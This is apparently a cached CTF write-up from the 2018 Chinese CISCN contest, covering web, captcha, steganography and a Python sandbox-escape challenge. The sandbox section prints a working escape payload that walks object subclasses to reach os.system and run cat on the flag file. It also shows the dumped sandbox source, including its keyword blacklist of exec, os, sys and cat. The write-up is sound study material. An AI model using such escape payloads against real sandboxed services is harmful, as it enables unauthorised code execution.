第十一届全国大学生信息安全竞赛“创新实践能力赛”
原文链接 http://findneo.tech/20180430ciscn/
注:以下为加速网络访问所做的原文缓存,经过重新格式化,可能存在格式方面的问题,或偶有遗漏信息,请以原文为准。
WEB
easyweb
http://114.116.26.217/
学习了一波json web token ,但是没想到是个脑洞。
账户admin,空密码登陆。
ciscn{2a36b5f78a1d6a107212d82ee133c421}
MISC
验证码
本题目为验证码破解,选手需在指定时间完成对验证码的破解,成功后获取Flag。请使用队伍token进行登陆。 参考数据:https://share.weiyun.com/6e055fc3402e86c7cbb5384f1a6b41b8
https://game.captcha.qq.com/hslj/html/hslj/
题目有点问题,手动玩了一会儿。
ciscn{12qiftb1qj12mbzm1xmjd2iix2ibqz7i}
后来换成输验证码得flag了。
picture
请从图中找出密码。
binwalk -e
分离得到 97E4
和 97E4.zlib
两个文件,后者是前者的 zlib 压缩文件。
import zlib

# Sanity check for the two binwalk outputs: 97E4.zlib should inflate to exactly
# the bytes of 97E4.  Prints True when they match.
with open('97E4.zlib', 'rb') as compressed, open('97E4', 'rb') as plain:
    print(zlib.decompress(compressed.read()) == plain.read())
# got True
文件97E4
内容经 base64 解码后,再把每两个字节交换一次顺序(即按 16 位字节序翻转),得到的就是一个加密的压缩包。
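import base64
import binascii


def swap_word_bytes(data):
    """Hex-encode *data* after swapping the two bytes of every 16-bit word.

    data: the raw bytes (here: the base64-decoded contents of 97E4).
    Returns the lowercase hex string of the byte-swapped blob.

    A trailing odd byte is kept as-is.  The original loop iterated over
    len(hex) // 4 words and silently dropped such a byte; it also built the
    output with repeated string concatenation and used the Python 2-only
    str.encode("hex"), both replaced here (binascii works on 2 and 3).
    """
    words = [data[i:i + 2][::-1] for i in range(0, len(data), 2)]
    return binascii.hexlify(b"".join(words)).decode("ascii")


if __name__ == "__main__":
    with open('97E4', 'rb') as fh:
        t = fh.read()
    # The file holds base64 text; decoding it and fixing the byte order gives
    # the password-protected archive described in the write-up.
    n = swap_word_bytes(base64.b64decode(t))
    print(n)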
# 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
大致内容如下:
对比得到密码: integer division or modulo by zero
得到一串编码后字符:
解码得到 CISCN{C16E6F6E065DA0306E318D095C68BDC0}
run
参考链接:
- http://cauc.me/2017/11/16/python%E6%B2%99%E7%9B%92%E7%BB%95%E8%BF%87/
- https://blog.csdn.net/qq_35078631/article/details/78504415
payload(沿 `().__class__.__bases__[0].__subclasses__()` 链拿到某个类的 `__init__` 的全局变量,从中取出已加载的 `linecache` 模块,再经其全局变量得到 `os.system`;`'o'+'s'`、`'sy'+'stem'`、`'ca'+'t'`、`'func_global'+'s'` 这些拆分是为了绕过下面 sandbox.py 中 input_filter 对 os / sys / cat / ls 等子串的黑名单匹配):
# Sandbox escape.  Walk from a tuple to `object`, pick one of its subclasses,
# read that class's __init__ globals ('func_globals' is the Python 2 name) to
# reach the already-imported `linecache` module, whose globals hold `os`, and
# call os.system from there.  No import is needed, so safe_import's empty
# whitelist never gets a say.
# The split string literals are there because input_filter() (sandbox.py,
# below) rejects any line whose lowercased text contains "os", "sys", "cat"
# or "ls" as a substring: 'o'+'s', 'sy'+'stem', 'ca'+'t' and 'func_global'+'s'
# ("func_globals" contains "ls") only become those names at run time, after
# the filter has looked at the source text.
# NOTE(review): the subclass index (59) is specific to the target's
# interpreter; enumerate __subclasses__() on the target before reusing it.
print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t'+' /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
# ciscn{db87226edc7f9aff82a6b524053eef9e}
顺便dump下来几个文件
cpython.py
from ctypes import pythonapi, POINTER, py_object

# _PyObject_GetDictPtr(obj) returns a PyObject** pointing at the slot that
# holds obj's instance dict.  Going through the C API hands back the real,
# mutable dict even for objects such as `type` that only expose a read-only
# mappingproxy via __dict__; sandbox.py relies on that to delete entries from
# `type` and from the function type.
_raw_dict_ptr = pythonapi._PyObject_GetDictPtr
_raw_dict_ptr.restype = POINTER(py_object)
_raw_dict_ptr.argtypes = [py_object]
# Drop the ctypes names from this module's namespace once the function pointer
# is configured (presumably so sandboxed code cannot reach ctypes through here).
del pythonapi, POINTER, py_object


def get_dict(ob):
    """Return the mutable dict behind *ob*, bypassing any mappingproxy.

    ob: any object that has a dict slot.
    Returns the dict object itself, not a copy.
    Raises ValueError (ctypes NULL-pointer access) if *ob* has no dict slot.
    """
    return _raw_dict_ptr(ob).contents.value
sandbox.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-04-09 23:30:58
# @Author : Xu (you@example.org)
# @Link : https://xuccc.github.io/
# @Version : $Id$
from sys import modules
from cpython import get_dict
from types import FunctionType
# The __main__ namespace this sandbox locks down, and the builtins mapping it
# starts from.  Both are the live objects, not copies: when this file runs as
# __main__, `main` is this module's own globals and `origin_builtins` is the
# real builtins module's dict.
main = vars(modules['__main__'])
origin_builtins = vars(main['__builtins__'])
def delete_type():
    """Strip ``__bases__`` and ``__subclasses__`` from ``type``'s own dict.

    ``get_dict`` (cpython.py) returns the real dict behind ``type.__dict__``,
    so the deletion applies to every class in the interpreter.  The intent is
    to break the ``().__class__.__bases__[0].__subclasses__()`` walk used to
    reach loaded modules from inside the sandbox.  Note that the call site
    further down leaves this function commented out, so the walk still works.
    Raises KeyError if either name is already gone.
    """
    type_namespace = get_dict(type)
    for attr in ('__bases__', '__subclasses__'):
        del type_namespace[attr]
def delete_func_code():
    """Remove the ``func_code`` descriptor from the function type.

    ``func_code`` is the Python 2 name of a function's code object; deleting
    it from the real dict behind ``FunctionType`` (via ``get_dict``) means
    ``f.func_code`` can no longer be read or replaced, presumably to block
    smuggling arbitrary bytecode into the sandbox.  Raises KeyError if the
    entry is already gone.
    """
    get_dict(FunctionType).pop('func_code')
def safe_import(__import__, whiteList):
    """Build a replacement for ``__import__`` that only allows *whiteList*.

    __import__: the real import hook to delegate to.
    whiteList: names that may be imported; checked at call time, so the
        caller's list object is consulted as it is at that moment.
    Returns an importer with ``__import__``'s Python 2 signature (level -1 is
    Python 2's default).  A whitelisted name is forwarded unchanged; any other
    name prints a ban message and yields ``None`` instead of raising
    ImportError.  Only the name lookup is guarded: modules already loaded in
    ``sys.modules`` remain reachable through ordinary object references.
    """
    def importer(name, globals={}, locals={}, fromlist=[], level=-1):
        if name not in whiteList:
            print("HAHA,[%s] has been banned~" % name)
            return None
        return __import__(name, globals, locals, fromlist, level)
    return importer
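class ReadOnly(dict):
    """A dict whose Python-level mutators all raise ``ValueError``.

    Used to freeze the builtins mapping handed to sandboxed code.  Reads work
    as on a plain dict; every method that could add, replace or remove an
    entry raises.  ``clear`` and ``__ior__`` (``|=``, Python 3.9+) were
    missing from the original and could still empty or extend the mapping.

    Two caveats for anyone relying on this: ``ReadOnly(d)`` *copies* ``d``
    rather than wrapping it, and the base-class slots are untouched, so
    ``dict.__setitem__(ro, k, v)`` / ``dict.clear(ro)`` still mutate the
    instance.  This guards against accidental mutation; it is not a security
    boundary on its own.
    """

    def __delitem__(self, keys):
        raise ValueError(":(")

    def pop(self, key, default=None):
        raise ValueError(":(")

    def popitem(self):
        raise ValueError(":(")

    def setdefault(self, key, value):
        raise ValueError(":(")

    def __setitem__(self, key, value):
        raise ValueError(":(")

    def __setattr__(self, name, value):
        raise ValueError(":(")

    def update(self, *args, **kwargs):
        raise ValueError(":(")

    def clear(self):
        raise ValueError(":(")

    def __ior__(self, other):
        raise ValueError(":(")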
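def builtins_clear(namespace=None):
    """Delete every name except a small whitelist from *namespace*'s dict.

    namespace: a module-like object whose ``__dict__`` is pruned in place.
        Defaults to this module's ``__builtins__``; when the file runs as
        __main__ that is the builtins module itself, so the deletions affect
        the whole interpreter, not a copy.
    Only raw_input, SyntaxError, ValueError, NameError, Exception and
    __import__ survive (the REPL below needs the first and catches the
    exceptions; __import__ is swapped for a whitelisting wrapper afterwards).
    Returns None.
    """
    keep = set("raw_input SyntaxError ValueError NameError Exception __import__".split(" "))
    target = (__builtins__ if namespace is None else namespace).__dict__
    # Snapshot the keys first: deleting while iterating a live key view raises
    # "dictionary changed size during iteration" on Python 3 (Python 2's
    # .keys() returned a list, which hid the problem).
    for name in list(target):
        if name not in keep:
            del target[name]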
def input_filter(string):
    """Return *string* unchanged unless it contains a banned word, else "".

    The check is a case-insensitive substring match against the source text
    the user typed.  It never sees names that are only assembled at run time
    (``'o'+'s'``, ``chr()`` tricks, ``getattr`` with a computed name), which
    is exactly how the payload in this write-up gets past it.  On the first
    hit the banned word is printed and "" is returned, which the REPL below
    then exec's as a no-op.
    """
    lowered = string.lower()
    for word in "exec eval pickle os subprocess input sys ls cat".split(" "):
        if word in lowered:
            print("{} has been banned!".format(word))
            return ""
    return string
# delete_type() is left disabled, so `__bases__` and `__subclasses__` stay
# reachable on every class -- the usual `().__class__.__bases__[0]
# .__subclasses__()` route out of the sandbox (see the payload above).
# delete_type();
del delete_type
# Remove func_code from the function type, then prune the builtins down to
# the whitelist.  When this file runs as __main__, `origin_builtins` and
# `__builtins__.__dict__` are the same live dict, so this is the real builtins
# module being emptied, not a copy.
delete_func_code();del delete_func_code
builtins_clear();del builtins_clear
# Empty whitelist: every import that goes through __import__ prints a ban
# message and returns None.  Modules already in sys.modules are unaffected
# and stay reachable through object references.
whiteMod = []
origin_builtins['__import__'] = safe_import(__import__,whiteMod)
# ReadOnly(...) copies the (now pruned) builtins dict; the copy, not the live
# builtins module, is installed as __main__'s __builtins__.
safe_builtins = ReadOnly(origin_builtins);del ReadOnly
main['__builtins__'] = safe_builtins;del safe_builtins
# Scrub the helpers and module metadata from the namespace the REPL exec's
# into.  NOTE(review): when this runs as __main__, `main` *is* this module's
# globals, so `del __builtins__` below removes the ReadOnly mapping installed
# two lines up again -- confirm that is intended.
del get_dict,modules,origin_builtins,safe_import,whiteMod,main,FunctionType
del __builtins__, __doc__, __file__, __name__, __package__
# Banner.  This is a non-raw string, so a line ending in a backslash is joined
# with the next one; the art may not print exactly as laid out here (and this
# copy may have lost leading/trailing spaces in the page cache).
print """
____
| _ \ _ _ _ __
| |_) | | | | '_ \
| _ <| |_| | | | |
|_| \_\\__,_|_| |_|
Escape from the dark house built with python :)
Try to getshell then find the flag!
"""
# REPL: each line passes through the substring blacklist and is then exec'd
# in this module's (now stripped) namespace.  The filter only inspects source
# text, so names built at run time are not caught; a banned line becomes ""
# and exec's as a no-op.  The handlers print fixed messages and discard the
# exception, so nothing about the failure is echoed back.
while 1:
    inp = raw_input('>>>')
    cmd = input_filter(inp)
    try:
        exec cmd
    except NameError, e:
        print "wow something lose!We can\'t find it ! D:"
    except SyntaxError,e:
        print "Noob! Synax Wrong! :("
    except Exception,e:
        print "unknow error,try again :>"
/home/ctf/bin